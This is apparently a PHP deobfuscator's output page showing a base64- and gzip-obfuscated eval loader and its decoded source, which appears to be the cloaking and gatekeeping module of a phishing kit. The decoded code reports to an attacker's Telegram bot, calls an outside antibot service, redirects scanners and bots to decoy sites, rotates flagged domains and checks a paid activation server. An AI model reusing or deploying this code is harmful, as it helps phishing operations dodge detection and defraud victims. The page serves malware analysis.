Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); eval(gzuncompress(base64_decode('eJwNlEWuxQiyRJfTVfLAdE1q9cD..

Decoded Output download

function curll($url)
{
    $arrContextOptions = [
        "ssl" => ["verify_peer" => false, "verify_peer_name" => false],
    ];
    $result = file_get_contents($url, false, stream_context_create($arrContextOptions));
    return $result;
}


function getip($remote)
{
    $get_user_ip = curll("http://ip-api.com/json/" . $remote);
    $ip_to_json = json_decode($get_user_ip);
    if ($ip_to_json->status === 'success') {
        return array($ip_to_json->country, $ip_to_json->countryCode);
    } else {
        $get_user_ip = curll("http://www.geoplugin.net/json.gp?ip=" . $remote);
        $ip_to_json = json_decode($get_user_ip);
        return array($ip_to_json->geoplugin_countryName, $ip_to_json->geoplugin_countryCode);
    }

}

function teleg($msg)
{
    global $bot_token, $chat_id;
    curll("https://api.telegram.org/bot" . $bot_token . "/sendMessage?chat_id=" . $chat_id . "&text=" . $msg . "&disable_web_page_preview=True");

}

function debug_teleg($msg)
{
    global $bot_token, $chat_id, $enable_debug;
    if ($enable_debug) {
        curll("https://api.telegram.org/bot" . $bot_token . "/sendMessage?chat_id=" . $chat_id . "&text=" . $msg . "&disable_web_page_preview=True&parse_mode=HTML");
    }

}

function faker()
{
    global $root_dir;
    $array = explode("
", file_get_contents($root_dir . "/fakelist.txt"));
    $multiple_url = $array[array_rand($array)];
    header("Location: " . $multiple_url);
    exit();
}


function secret_key($p_key, $stwitch_sss)
{
    if ($stwitch_sss) {
        if (!isset($_GET[$p_key])) {
            return false;
        }
    }
    return true;
}


function antibot($us_agent, $us_ip)
{
    global $activated;
    $resutlt = curll("https://vv.mustleak.com/bot?ip?=" . $us_ip . "&au=" . $us_agent . "&key=" . $activated);
    $data = json_decode($resutlt, true);
    if (!$data['ok']){
    debug_teleg("blocked! bot/vpn/proxy accessing the page" . blocked_res($us_ip));
    faker();
    }
}



function blocked_res($userip)
{
    return "<pre>Detail: IP=" . $userip . " Country=" . getip($userip)[0] . "</pre>";
}



function validate_user($user_ip, $user_agent)
{
    global $url_file, $fuck1, $secret_key_access;

    if (!filter_var($user_ip, FILTER_VALIDATE_IP)) {
        debug_teleg("wrong ip format blocked!" . blocked_res($user_ip));
    } elseif (!trim(file_get_contents($url_file))) {
        debug_teleg("url list is empty!, redirected user" . blocked_res($user_ip));
    } elseif (!secret_key($fuck1, $secret_key_access)) {
        debug_teleg("blocked! access key was not passed" . blocked_res($user_ip));
    } else {
        return true;
    }
}


function fill_json($file, $key, $value)
{
    $json = file_get_contents($file);
    $datajson = json_decode($json, true);
    $datajson[$key] = $value;
    file_put_contents($file, json_encode($datajson));
}


function read_json($file, $key)
{
    $json = file_get_contents($file);
    $datajson = json_decode($json, true);
    return $datajson[$key];
}


function task_timer($minutes, $db_file, $key)
{

    global $root_dir;

    $task_json_array = array(
        'date0' => "",
        'date1' => "",
        "domain" => ""
    );


    if (!file_exists($root_dir . '/task.json')) {
        file_put_contents($root_dir . '/task.json', json_encode($task_json_array));
    }

    $current_time = date('Y-m-d h:i:s', time());
    if (empty(read_json($db_file, $key))) {
        fill_json($db_file, $key, $current_time);
    }


    if ($key == 'date0') {
        if (!file_exists($root_dir . '/cap.html')) {
            return true;
        }
    }


    if ($key == 'date1') {
        if (empty(read_json($db_file, 'domain'))) {
            return true;

        }
    }

    $grab_time = read_json($db_file, $key);
    $task_timer = round((strtotime($current_time) - strtotime($grab_time)) / 60);

    if ($task_timer > $minutes) {
        fill_json($db_file, $key, $current_time);
        return true;
    }

}





function checker($re, $ug, $c, $a, $u, $r)
{
    global $checkurl_timer;
    if (validate_user($re, $ug)) {

        if (task_timer($checkurl_timer, $r . '/task.json', 'date1')) {

            foreach (file($u, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $d) {
                $result = curll("https://" . $c . "/auth?domain=" . $d . "&key=" . urlencode($a) . "&host=" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"] . "&v=v_24.0&");
                if ($result == "0") {
                    $domains = [$d];
                    fill_json($r . '/task.json', 'domain', $domains[0]);
                    break;
                } elseif ($result == "2") {
                    exit('Message me at https://t.me/badaxxbot or email me [email protected] for activation key');
                } elseif ($result == "1") {
                    teleg("this url is bad, Please replace " . $d);
                    $content = file_get_contents($u);
                    $content = str_replace($d, "", $content);
                    file_put_contents($u, $content);
                } else {
                    debug_teleg("unable to perform verifications, please check your hosting");
                    faker();

                }

            }

        }

    } else {

        faker();
    }
}

Did this file decode correctly?

Original Code

<?php

error_reporting(0);
eval(gzuncompress(base64_decode('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')));


?>

Function Calls

gzuncompress 2
base64_decode 2
error_reporting 1

Variables

None

Stats

MD5 ab497317d6dc063cabce1a550e34d0c0
Eval Count 2
Decode Time 47 ms